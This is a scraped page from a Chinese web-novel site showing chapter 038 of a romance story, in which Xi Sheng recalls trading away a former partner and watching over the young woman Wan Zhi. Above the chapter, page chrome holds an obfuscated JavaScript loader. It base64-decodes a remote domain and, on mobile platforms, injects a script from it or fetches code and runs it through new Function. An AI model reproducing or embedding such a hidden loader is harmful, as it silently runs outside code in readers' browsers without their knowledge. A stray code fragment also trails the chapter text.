98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuaHN2Y2huc3ZuY3Z2ZC5jb20=','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一页
目录 | 设置
下一章

038彼时(2 / 2)

加入书签 | 推荐本书 | 问题反馈 |

他只字不提那热烈的投怀送抱:“欠你一次。”

疑似的哭泣停顿:“你帮我纹个刺青。”

众所周知,奚晟后背的鹰是独一无二的,笔触别人模仿不来。

如果她也有,至少在某种程度上可以与他比肩。

谁能想到,被爱情蒙蔽的双眼在多年后终于揭开:“Your partner is so hot!”

夹着雪茄的手指向她,露骨的欲望毫不掩饰。

几番交易,叶欣从自以为的女主人变成商品。

明明前一秒,她还是前来参加奚晟私人party的女伴,现实给了原本引以为傲的脸上一记响亮的耳光。

“你以为那是什么?”交接时奚晟还亲昵耳语,目光扫向她的脚踝,戳破她苦苦包裹的糖衣,“那是放弃。”

他放弃地下,她放弃自由。

要坐稳他身边人的位置,一定得付出什么。

或者说,奚晟的身边人,都是可交换的。

角落的阴影里堆积了许多冷眼旁观,一只空酒杯原地打转,高脚椅在安静的闹剧里孤独地旋转,像极了天旋地转的人生。

“呵。”他低声地笑,被她蠢笑了。

可笑的爱情让她的眼睛发亮:“奚晟身上出自你的手笔,我知道。”

这是轻易不外流的,她知道。

自以为是,何等愚蠢。

“好啊。”他答应得爽快。

代表劣质的印章,别人避之不及,却偏有人迎着往上赶。

后来重回光明的过渡期里,他发现一位新鲜的妙人。

他看到在喘息的灵魂,压抑在低垂的长颈之间,挣扎。

栀子香牵引汹涌的通感,欲望来得莫名其妙,身体开始行动。

那羸弱的身体却饱含生命力,很新鲜。

是的,实在太新鲜。

想要深究太过容易,也是一个悲剧的童年。

聪明的孩子不一定有糖吃,还是傻一点讨人喜欢,某种程度上,“懂事”代表着自我牺牲。

智商这东西,用好了的确带来许多便利,如果不,则会很危险。

慧极必伤。

他是,她也是。

他观察很久,看着她努力扮演听话的模范生,意外撞见她潇洒游离于纸醉金迷,双眼一直澄澈,始终清醒。

不知何时起了兴致,执着于逗狐狸甚至对竞赛都失去了兴趣,轻而易举摆平校方却忘了他爷爷,在他制造白色身份的时期出了岔子。

棋局摆好他才知晓,不过没关系,只要她没事。

玩人性,他很有经验。

优哉游哉,他看着她努力生活。

“其实我会,不过还是你来吧。”

他检查灯管:“怎么会这个?”

“以备不时之需嘛。”总归还是有一个人的时候。

陪她努力“上进”:读书、运动、快乐。

对她来说,快乐是件需要努力的事。

她有种魔力,总有办法提醒他那些早已抛之脑后的事。

他不理解,但希望她拥有。

各式角色一个个登场,心怀鬼胎各出奇招。

人人知道真相,人人粉饰太平,这又是多么残忍的真相。

从谁开始呢?

当然是“懂事”的大人。

至于那所谓的“姐姐”,请君入瓮。

如果快乐是她要努力的事,他只要她快乐。

至于他……

是时候了,他必须割掉影子,只是需要点时间。

来日方长。

“你有没有在听我说话!”不知第几次,手机那边在叫嚣,余光扫向等着他后方车位的方向,第一次,他低声答:“嗯。”

“又放鸽子玩消失,知不知道这次的工作有多重要……”

驾驶座的人儿探头探脑,黑白分明的大眼顶着青色的底,带着三分陌生、七分焦躁。

他举起手机,出于某种报复心理,拉下车窗。

不出所料,彻夜狂欢的疲惫被冲散,不知所措袭来,他满意地享受那有趣的故作平静。

淡色的唇抿起,努力收回脱框的大眼,睁着控制适当的大小,可爱极了。

“好了,不管怎么样……”突然的好说话倒是让手机那天安静下来,“海参崴那边,还需要你去一次。”

不成节奏的高跟鞋声在地下停车场格外响亮,代驾来了。

“晚栀对不起我喝断片儿了……”引擎发动,白色车身在甜腻的求饶声中扬长而去。

头顶正午烈日,会让影子存在吗?

有些事,一开始就注定的。

框架纯属虚构,这马甲既然叫freeloop,得对得起这笔名~', '~')

上一页
目录
下一章
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间